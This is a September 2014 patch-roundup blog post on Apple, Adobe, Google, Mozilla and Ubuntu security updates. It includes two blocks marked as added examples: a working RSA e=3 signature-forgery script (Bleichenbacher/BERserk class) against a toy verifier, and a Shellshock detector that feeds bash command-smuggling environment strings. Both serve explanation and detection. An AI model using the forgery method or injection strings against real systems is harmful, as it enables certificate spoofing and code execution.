It’s been another interesting month on the patch and vulnerability front, but this time the focus has been less on Microsoft products (although the company did have to pull one problematic non-security patch that was causing problems for OneDrive for Business customers). The big news when it comes to updating problems, though, was the release of iOS 8, which fixed more than 50 security vulnerabilities in Apple’s mobile operating system but also introduced a multitude of bugs and functionality problems, followed by the fiasco in which Apple released a fix (iOS 8.0.1) that caused even bigger problems and then yanked that update on the same day it was released.
Then along came Shellshock, a critical vulnerability in Bash, the default shell in most Linux/UNIX implementations, including OS X, creating a double whammy for Apple users.
Meanwhile, Adobe took the conservative course and delayed the release of its patches this month. Instead of putting them out on Patch Tuesday as is its usual practice, it waited a week in order to do further testing. No doubt the company was anxious to avoid the kind of problems (and resultant PR) that it saw Microsoft deal with in August, and it was likely doubly glad it went with the “better late than untested” philosophy once the iOS troubles emerged.
Apple
Apple released a total of seven updates this month (eight if you count the short-lived and no-longer-available iOS 8.0.1 update), for various products. All seven were released on September 17.
- iOS 8 was released for the iPhone 4s and later, the iPod touch (5th generation) and later, and the iPad 2 and later. The major OS update added features and addressed 53 security vulnerabilities in the previous versions of the OS. I covered all the vulnerabilities in detail in my earlier blog post so I won’t repeat it all here.
- Apple also released an update for OS X Mountain Lion and OS X Mavericks, the two most recent versions of its desktop/laptop operating system. It addressed more than 40 security vulnerabilities, including multiple issues in the PHP bundled with Apache, a validation issue in Bluetooth that could allow arbitrary code execution, an out-of-bounds memory read in CoreGraphics that could result in information disclosure upon opening a malicious PDF, a Foundation issue with NSXMLParser that could result in information disclosure, a user-space buffer overflow in the Intel graphics driver that could lead to arbitrary code execution, an IOKit API vulnerability, an out-of-bounds read in the IOAcceleratorFamily code, another in the IOHIDFamily code that could be used to bypass kernel ASLR, two IOKit issues that could allow arbitrary code execution with system privileges, a kernel vulnerability that could be used to bypass ASLR, a flaw in Libnotify by which malware could execute code with root privileges, multiple vulnerabilities in OpenSSL, three issues in QT Media Foundation and a heap buffer overflow in ruby.
- Two updates were released for OS X Server, one for version 2.2.3 running on Mountain Lion and one for version 3.2.1 running on Mavericks. Both addressed multiple vulnerabilities that include a SQL injection issue in Wiki Server, a cross-site scripting issue in Xcode Server, and multiple vulnerabilities in PostgreSQL. These are critical vulnerabilities that could result in arbitrary execution of SQL queries, arbitrary code or arbitrary JavaScript. The fixes imposed additional validation of SQL queries, improved encoding of HTML output, and updated PostgreSQL to version 9.2.7.
- An update for Safari 6.2 and 7.1 running on Mountain Lion and Mavericks addressed nine vulnerabilities in the web browser itself and in WebKit. The first involved saved passwords that were autofilled on HTTP sites, on HTTPS sites with broken trust and in iframes, which could enable an attacker to intercept user credentials. It was fixed by restricting autofill to the main frame of HTTPS sites whose certificate chain validates. The WebKit vulnerabilities included multiple memory corruption issues that could be used to execute arbitrary code or cause unexpected application crashes, as well as a flaw in the way web applications could store cache data, which let web sites track users even with private browsing enabled. These were addressed by improving memory handling and disabling access to the cache in private browsing mode.
- An update was released for Xcode running on Mavericks 10.9.4 or later, to address a single vulnerability by which an attacker could cause Subversion to terminate unexpectedly, resulting in a denial of service.
- Apple also issued an update for Apple TV (3rd generation and later), which addressed more than 30 separate vulnerabilities in various components of the Apple TV software, including those by which attackers could obtain users’ wi-fi credentials, access sensitive user information from logs, arbitrarily execute code, crash the system, cause unexpected restarts, read data from kernel memory, create a denial of service, bypass kernel hardening measures, and change permissions on files.
Adobe
As noted in my previous blog post, Adobe released two updates on September 16, a week past its normal schedule.
- Update APSB14-20 is an update for Adobe Reader and Acrobat running on Windows and Mac OS X. This patch addresses 8 vulnerabilities in Reader X and XI and Acrobat X and XI: a denial of service vulnerability, a heap overflow vulnerability, multiple memory corruption vulnerabilities and a use-after-free issue (the last three could all result in code execution), plus a universal cross-site scripting issue (Mac only) and a sandbox bypass (Windows only). The update is given a priority rating of 1 and the severity rating is critical on both Windows and Mac.
- Update APSB14-21 is an update for Adobe Flash Player on Windows, Macintosh OS X and Linux. It addresses 12 vulnerabilities that could potentially allow an attacker to take control of the system. The vulnerabilities include multiple memory leakage issues that could be used to bypass ASLR, a security bypass vulnerability, a use-after-free vulnerability that can be exploited to run code, and memory corruption vulnerabilities that also can lead to code execution, as well as a vulnerability that can be exploited to bypass the same origin policy and a heap buffer overflow vulnerability that could result in execution of arbitrary code. This update is assigned a priority rating of 1 for Adobe Flash Player on Windows and Mac machines and 3 for Flash Player on Linux and Adobe AIR. The severity rating is critical for all platforms.
Google
Google updated the Chrome web browser for Windows, Mac and Linux on September 9. The update fixes four security vulnerabilities, including a use-after-free vulnerability, along with various fixes from internal audits. The new version of Chrome is 37.0.2062.120 and it includes an update for Adobe Flash.
Since this seems to be the season for problematic patches, it came as no surprise that many users who updated to this version of Chrome reported issues, specifically a “Shockwave Flash has crashed” message. This isn’t an unusual occurrence; Shockwave Flash trouble on Chrome has been going on for a while. Here’s an article that explains a common cause of the crashes and how to fix it: How to stop Shockwave Flash crashing in Google Chrome.
Oracle
Oracle is on a quarterly release cycle, and July was the most recent month for updates. The next updates are scheduled to be released on October 14.
Mozilla
Mozilla released updates to fix a critical vulnerability in the Network Security Services (NSS) cryptographic library, which could be exploited to forge RSA signatures, and therefore certificates, allowing an attacker to impersonate a legitimate web site and trick users into revealing personal information to a fraudulent one. The bug is being called BERserk. NSS is used by the Firefox browser, the Thunderbird mail client and other Mozilla products, so the fix shipped in Firefox 32.0.3, Thunderbird 31.1.2 and 24.8.1, and SeaMonkey 2.29.1 (SeaMonkey is a project to develop an all-in-one Internet application suite: browser, mail, newsgroups, HTML editor, chat and web development tools).
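To show why a parsing bug in signature verification turns into certificate forgery, here is an added example that is not from the original post and is not NSS or Mozilla code. BERserk is a variant of Bleichenbacher's 2006 attack on PKCS#1 v1.5 verifiers that use a public exponent of 3: if the verifier does not insist that the DigestInfo fills the entire block after the padding, an attacker can build a block with the expected prefix, leave the rest free, and take an integer cube root, with no private key at all. The `lenient_verify` function below is a toy model of that class of bug (it checks the padding and the DigestInfo and ignores trailing bytes); the exact bytes NSS mishandled are in Intel's BERserk write-up and are not reproduced here. The key generation, message and verifier are all constructed for this demonstration.

```python
"""Bleichenbacher-style RSA signature forgery against a lenient PKCS#1 v1.5 verifier.

Added example, not from the original post and not NSS/Mozilla code. `lenient_verify`
is a toy model of the bug class behind BERserk: it parses 00 01 FF..FF 00 and the
DigestInfo but never checks what follows. `strict_verify` compares the whole block,
which is the correct check. All keys and messages here are constructed for the demo.
"""
import hashlib
import random

E = 3
# DER-encoded DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1)
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

def is_probable_prime(n, rounds=24):
    """Miller-Rabin with a little trial division first."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_key(bits=2048):
    """RSA key with public exponent 3 (p-1 and q-1 must not be multiples of 3)."""
    def prime(b):
        while True:
            p = random.getrandbits(b) | (1 << (b - 1)) | 1
            if p % 3 == 2 and is_probable_prime(p):
                return p
    p, q = prime(bits // 2), prime(bits // 2)
    return p * q, pow(E, -1, (p - 1) * (q - 1))   # (n, d); pow(-1) needs Python 3.8+

def digest_info(msg):
    return SHA256_DIGESTINFO + hashlib.sha256(msg).digest()

def emsa_pkcs1_v15(msg, k):
    t = digest_info(msg)
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def sign(msg, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, k), "big"), d, n)

def _block(sig, n):
    k = (n.bit_length() + 7) // 8
    return pow(sig, E, n).to_bytes(k, "big")

def strict_verify(msg, sig, n):
    """Correct check: the decoded block must equal the full expected encoding."""
    return _block(sig, n) == emsa_pkcs1_v15(msg, (n.bit_length() + 7) // 8)

def lenient_verify(msg, sig, n):
    """Flawed check: 00 01 FF..FF 00, then the DigestInfo; trailing bytes ignored."""
    em = _block(sig, n)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= len(em) or em[i] != 0x00:   # require at least 8 padding bytes
        return False
    t = digest_info(msg)
    return em[i + 1:i + 1 + len(t)] == t            # bytes after t are never examined

def icbrt_ceil(x):
    """Smallest integer s with s**3 >= x."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo

def forge(msg, n):
    """Shortest padding the lenient parser accepts, the rest of the block free, then
    a cube root. With e=3 and a 2048-bit n, s**3 < n (so no modular reduction) and
    the rounding error (about 2^1358) fits in the 194 free bytes, so the top of the
    block still reads 00 01 FF*8 00 DigestInfo. No private key is involved."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(msg)
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    return icbrt_ceil(target)

if __name__ == "__main__":
    n, d = gen_key()
    msg = b"CN=www.example.com (constructed sample message)"
    forged = forge(msg, n)
    print("genuine sig, strict check: ", strict_verify(msg, sign(msg, n, d), n))
    print("forged sig, lenient check: ", lenient_verify(msg, forged, n))
    print("forged sig, strict check:  ", strict_verify(msg, forged, n))
```

The forgery only works because the free bytes are large enough to absorb the cube-root rounding error; with a 1024-bit modulus the error (about 2^680) exceeds the 536 free bits, which is why such attacks target e=3 keys of 2048 bits and up. The practical fix is the one in `strict_verify`: decode the block and compare it byte-for-byte against the expected encoding rather than parsing it.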
Linux
As usual, popular Linux distros saw a large number of updates issued in September. Ubuntu issued 40 patches between September 3 and September 25, eleven more than in August. Other major Linux distributions issued similar updates.
- USN-2363-2: Bash vulnerability – 25th September 2014. USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch for CVE-2014-7169 didn’t get properly applied in the Ubuntu 14.04 LTS package. This update fixes the problem.
- USN-2363-1: Bash vulnerability – 25th September 2014. Tavis Ormandy discovered that the security fix for Bash included in USN-2362-1 was incomplete. An attacker could use this issue to bypass certain environment restrictions.
- USN-2360-2: Thunderbird vulnerabilities – 24th September 2014. USN-2360-1 fixed vulnerabilities in Firefox. This update provides the corresponding updates for Thunderbird. Original advisory details: Antoine Delignat-Lavaud and others discovered that NSS incorrectly handled parsing ASN.1 values. An attacker could use this issue to forge RSA certificates.
- USN-2360-1: Firefox vulnerabilities – 24th September 2014. Antoine Delignat-Lavaud and others discovered that NSS incorrectly handled parsing ASN.1 values. An attacker could use this issue to forge RSA certificates.
- USN-2361-1: NSS vulnerability – 24th September 2014. Antoine Delignat-Lavaud and others discovered that NSS incorrectly handled parsing ASN.1 values. An attacker could use this issue to forge RSA certificates.
- USN-2362-1: Bash vulnerability – 24th September 2014. Stephane Chazelas discovered that Bash incorrectly handled trailing code in function definitions. An attacker could use this issue to bypass environment restrictions, such as SSH forced command environments.
- USN-2359-1: Linux kernel vulnerabilities – 23rd September 2014. Jack Morgenstein reported a flaw in the page handling of the KVM (Kernel Virtual Machine) subsystem in the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service (host OS memory corruption) or possibly have other unspecified impact on the host OS.
- USN-2358-1: Linux kernel (Trusty HWE) vulnerabilities – 23rd September 2014. Jack Morgenstein reported a flaw in the page handling of the KVM (Kernel Virtual Machine) subsystem in the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service (host OS memory corruption) or possibly have other unspecified impact on the host OS.
- USN-2357-1: Linux kernel (OMAP4) vulnerabilities – 23rd September 2014. Jack Morgenstein reported a flaw in the page handling of the KVM (Kernel Virtual Machine) subsystem in the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service (host OS memory corruption) or possibly have other unspecified impact on the host OS.
- USN-2356-1: Linux kernel vulnerabilities – 23rd September 2014. Jack Morgenstein reported a flaw in the page handling of the KVM (Kernel Virtual Machine) subsystem in the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service (host OS memory corruption) or possibly have other unspecified impact on the host OS.
- USN-2355-1: Linux kernel (EC2) vulnerabilities – 23rd September 2014. Chris Evans reported a flaw in the Linux kernel’s handling of iso9660 (compact disc filesystem) images. An attacker who can mount a custom iso9660 image, either via a CD/DVD drive or a loopback mount, could cause a denial of service (system crash or reboot).
- USN-2354-1: Linux kernel vulnerabilities – 23rd September 2014. Chris Evans reported a flaw in the Linux kernel’s handling of iso9660 (compact disc filesystem) images. An attacker who can mount a custom iso9660 image, either via a CD/DVD drive or a loopback mount, could cause a denial of service (system crash or reboot).
- USN-2353-1: APT vulnerability – 23rd September 2014. It was discovered that APT incorrectly handled certain http URLs. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to cause APT to crash, resulting in a denial of service, or possibly execute arbitrary code.
- USN-2352-1: DBus vulnerabilities – 22nd September 2014. Simon McVittie discovered that DBus incorrectly handled the file descriptors message limit. A local attacker could use this issue to cause DBus to crash, resulting in a denial of service, or possibly execute arbitrary code.
- USN-2351-1: nginx vulnerability – 22nd September 2014. Antoine Delignat-Lavaud and Karthikeyan Bhargavan discovered that nginx incorrectly reused cached SSL sessions. An attacker could possibly use this issue in certain configurations to obtain access to information from a different virtual host.
- USN-2350-1: NSS update – 22nd September 2014. The NSS package contained outdated CA certificates. This update refreshes the NSS package to version 3.17 which includes the latest CA certificate bundle.
- USN-2349-1: Libav vulnerabilities – 17th September 2014. It was discovered that Libav incorrectly handled certain malformed media files. If a user were tricked into opening a crafted media file, an attacker could cause a denial of service via application crash, or possibly execute arbitrary code with the privileges of the user invoking the program.
- USN-2319-3: OpenJDK 7 update – 16th September 2014. USN-2319-1 fixed vulnerabilities in OpenJDK 7. This update provides stability fixes for the arm64 and ppc64el architectures. Original advisory details: Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability.
- USN-2348-1: APT vulnerabilities – 16th September 2014. It was discovered that APT did not re-verify downloaded files when the If-Modified-Since condition wasn’t met. (CVE-2014-0487) It was discovered that APT did not invalidate repository data when it switched from an unauthenticated to an authenticated state. (CVE-2014-0488) It was discovered that the APT Acquire::GzipIndexes option caused APT to skip checksum validation.
- USN-2347-1: Django vulnerabilities – 16th September 2014. Florian Apolloner discovered that Django incorrectly validated URLs. A remote attacker could use this issue to conduct phishing attacks. (CVE-2014-0480) David Wilson discovered that Django incorrectly handled file name generation. A remote attacker could use this issue to cause Django to consume resources, resulting in a denial of service.
- USN-2346-1: curl vulnerabilities – 15th September 2014. Tim Ruehsen discovered that curl incorrectly handled partial literal IP addresses. This could lead to the disclosure of cookies to the wrong site, and malicious sites being able to set cookies for others. (CVE-2014-3613) Tim Ruehsen discovered that curl incorrectly allowed cookies to be set for Top Level Domains (TLDs).
- USN-2330-1: Thunderbird vulnerabilities – 11th September 2014. Jan de Mooij, Christian Holler, Karl Tomlinson, Randell Jesup, Gary Kwong, Jesse Ruderman and JW Wang discovered multiple memory safety issues in Thunderbird. If a user were tricked in to opening a specially crafted message with scripting enabled, an attacker could potentially exploit these to cause a denial of service.
- USN-2344-1: PHP vulnerabilities – 9th September 2014. It was discovered that the Fileinfo component in php5 contains an integer overflow. An attacker could use this flaw to cause a denial of service or possibly execute arbitrary code via a crafted CDF file. (CVE-2014-3587) It was discovered that the php_parserr function contains multiple buffer overflows.
- USN-2343-1: NSS vulnerability – 9th September 2014. Tyson Smith and Jesse Schwartzentruber discovered that NSS contained a race condition when performing certificate validation. An attacker could use this issue to cause NSS to crash, resulting in a denial of service, or possibly execute arbitrary code.
- USN-2342-1: QEMU vulnerabilities – 8th September 2014. Michael S. Tsirkin, Anthony Liguori, and Michael Roth discovered multiple issues with QEMU state loading after migration. An attacker able to modify the state data could use these issues to cause a denial of service, or possibly execute arbitrary code.
- USN-2341-1: CUPS vulnerabilities – 8th September 2014. Salvatore Bonaccorso discovered that the CUPS web interface incorrectly validated permissions and incorrectly handled symlinks. An attacker could possibly use this issue to bypass file permissions and read arbitrary files, possibly leading to a privilege escalation.
- USN-2306-3: GNU C Library regression – 8th September 2014. USN-2306-1 fixed vulnerabilities in the GNU C Library. On Ubuntu 10.04 LTS, the fix for CVE-2013-4357 introduced a memory leak in getaddrinfo. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Maksymilian Arciemowicz discovered that the GNU C Library incorrectly handled the getaddrinfo() function.
- USN-2340-1: procmail vulnerability – 4th September 2014. Tavis Ormandy discovered that the formail tool incorrectly handled certain malformed mail headers. An attacker could use this flaw to cause formail to crash, resulting in a denial of service, or possibly execute arbitrary code.
- USN-2339-2: Libgcrypt vulnerability – 3rd September 2014. Daniel Genkin, Adi Shamir, and Eran Tromer discovered that Libgcrypt was susceptible to an adaptive chosen ciphertext attack via physical side channels. A local attacker could use this attack to possibly recover private keys.
- USN-2339-1: GnuPG vulnerability – 3rd September 2014. Daniel Genkin, Adi Shamir, and Eran Tromer discovered that GnuPG was susceptible to an adaptive chosen ciphertext attack via physical side channels. A local attacker could use this attack to possibly recover private keys.
- USN-2338-1: Lua vulnerability – 3rd September 2014. It was discovered that Lua incorrectly handled certain vararg functions with a large number of fixed parameters. An attacker could use this issue to cause Lua applications to crash, resulting in a denial of service, or possibly execute arbitrary code.
- USN-2326-1: Oxide vulnerabilities – 2nd September 2014. A use-after-free was discovered in the SVG implementation in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process.
- USN-2329-1: Firefox vulnerabilities – 2nd September 2014. Jan de Mooij, Christian Holler, Karl Tomlinson, Randell Jesup, Gary Kwong, Jesse Ruderman, JW Wang and David Weir discovered multiple memory safety issues in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service.
- USN-2337-1: Linux kernel vulnerabilities – 2nd September 2014. A flaw was discovered in the Linux kernel virtual machine’s (kvm) validation of interrupt requests (irq). A guest OS user could exploit this flaw to cause a denial of service (host OS crash). (CVE-2014-0155) Andy Lutomirski discovered a flaw in the authorization of netlink socket operations.
- USN-2336-1: Linux kernel (Trusty HWE) vulnerabilities – 2nd September 2014. A flaw was discovered in the Linux kernel virtual machine’s (kvm) validation of interrupt requests (irq). A guest OS user could exploit this flaw to cause a denial of service (host OS crash). (CVE-2014-0155) Andy Lutomirski discovered a flaw in the authorization of netlink socket operations when a socket.
- USN-2335-1: Linux kernel (OMAP4) vulnerabilities – 2nd September 2014. A flaw was discovered in the Linux kernel’s audit subsystem when auditing certain syscalls. A local attacker could exploit this flaw to obtain potentially sensitive single-bit values from kernel memory or cause a denial of service (OOPS).
- USN-2334-1: Linux kernel vulnerabilities – 2nd September 2014. A flaw was discovered in the Linux kernel’s audit subsystem when auditing certain syscalls. A local attacker could exploit this flaw to obtain potentially sensitive single-bit values from kernel memory or cause a denial of service (OOPS).
- USN-2331-1: LibreOffice vulnerability – 2nd September 2014. Rohan Durve and James Kettle discovered LibreOffice Calc sometimes allowed for command injection when opening spreadsheets. If a user were tricked into opening a crafted Calc spreadsheet, an attacker could exploit this to run programs as your login.
- USN-2333-1: Linux kernel (EC2) vulnerabilities – 2nd September 2014. A bug was discovered in the handling of pathname components when used with an autofs direct mount. A local user could exploit this flaw to cause a denial of service (system crash) via an open system call.
- USN-2332-1: Linux kernel vulnerabilities – 2nd September 2014. A bug was discovered in the handling of pathname components when used with an autofs direct mount. A local user could exploit this flaw to cause a denial of service (system crash) via an open system call.
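The Bash entries above (USN-2362-1, USN-2363-1 and USN-2363-2) describe the bug but not how to tell whether a given host is still exposed. The following is an added example, not from the original post or from Ubuntu's advisories, that runs the two probes that circulated at disclosure time against whichever `bash` is on PATH (an assumption; if there is none the checks report "no-bash"). The SSH forced-command case mentioned in USN-2362-1 matters because sshd hands the client's requested command to the forced command in the environment variable SSH_ORIGINAL_COMMAND, so a key restricted to a single command could still feed an unpatched bash a value beginning with "() {" and run arbitrary code.

```python
"""Local checks for the two Bash bugs in USN-2362-1 and USN-2363-1.

Added example, not from the original post or from Ubuntu's advisories. Assumes a
`bash` binary on PATH; each check returns "vulnerable", "patched" or "no-bash".
"""
import os
import shutil
import subprocess
import tempfile

MARKER = "SHELLSHOCK_PROBE_RAN"   # constructed marker string, chosen for this demo

def _run_bash(script, extra_env, cwd=None):
    """Run `bash -c script` with extra environment variables; None if bash is absent."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    env = dict(os.environ)
    env.update(extra_env)
    return subprocess.run([bash, "-c", script], env=env, cwd=cwd,
                          capture_output=True, text=True)

def check_cve_2014_6271():
    """Original bug: bash imports a function from any environment variable whose
    value starts with "() {" by evaluating the value, and an unpatched parser keeps
    going after the closing brace, so the trailing `echo` runs at startup."""
    res = _run_bash("echo probe", {"x": "() { :;}; echo " + MARKER})
    if res is None:
        return "no-bash"
    return "vulnerable" if MARKER in res.stdout else "patched"

def check_cve_2014_7169():
    """Incomplete first fix (USN-2363-1): a crafted definition leaves the parser in a
    state where the next command is parsed as a redirection, so `echo date` creates
    a file named "echo" in the working directory instead of printing "date"."""
    with tempfile.TemporaryDirectory() as tmp:
        res = _run_bash("echo date", {"X": "() { (a)=>\\"}, cwd=tmp)
        if res is None:
            return "no-bash"
        return "vulnerable" if os.path.exists(os.path.join(tmp, "echo")) else "patched"

def report():
    """Both verdicts keyed by CVE, for logging or for a fleet-wide inventory job."""
    return {"CVE-2014-6271": check_cve_2014_6271(),
            "CVE-2014-7169": check_cve_2014_7169()}

if __name__ == "__main__":
    for cve, verdict in report().items():
        print(f"{cve}: {verdict}")
```

Run it as a normal user; neither probe needs privileges, and the second one only writes inside a temporary directory that is removed afterwards. A host that reports "patched" for CVE-2014-6271 but "vulnerable" for CVE-2014-7169 has the state USN-2363-2 was issued to correct: the first fix applied, the follow-up not.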